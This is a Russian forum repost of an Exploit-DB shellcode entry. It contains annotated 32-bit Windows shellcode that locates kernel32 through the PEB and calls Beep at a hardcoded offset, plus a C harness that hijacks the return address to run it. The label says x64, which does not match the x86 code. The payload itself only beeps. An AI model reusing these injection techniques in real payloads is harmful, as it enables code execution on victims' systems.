Exploit Windows/x64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13719
Проверка EDB
  1. Пройдено
Автор
AGIX
Тип уязвимости
SHELLCODE
Платформа
WINDOWS_X86-64
CVE
N/A
Дата публикации
2010-05-28
C:
#include <stdio.h>

char shellcode[] =

"\x31\xC9" //xor ecx, ecx
"\x64\x8B\x71\x30" //mov esi, [fs:ecx+0x30]
"\x8B\x76\x0C" //mov esi, [esi+0x0C]
"\x8B\x76\x1C" //mov esi, [esi+0x1c]
"\x8B\x06" //mov eax, [esi]
"\x8B\x68\x08" //mov ebp, [eax+0x08]
"\x68\x11\x11\x11\x11" //push 0x11111111
"\x66\x68\x11\x11" //push word 0x1111
"\x5B" //pop ebx
"\x53" //push ebx
"\x55" //push ebp
"\x5B" //pop ebx
"\x66\x81\xC3\x4B\x85" //add bx, 0x854b
"\xFF\xD3" //call ebx
"\xEB\xEA"; //jmp short 


int main(int argc, char **argv) {
        int *ret;
        ret = (int *)&ret + 2;
        (*ret) = (int) shellcode;
}
 
Источник
www.exploit-db.com

Похожие темы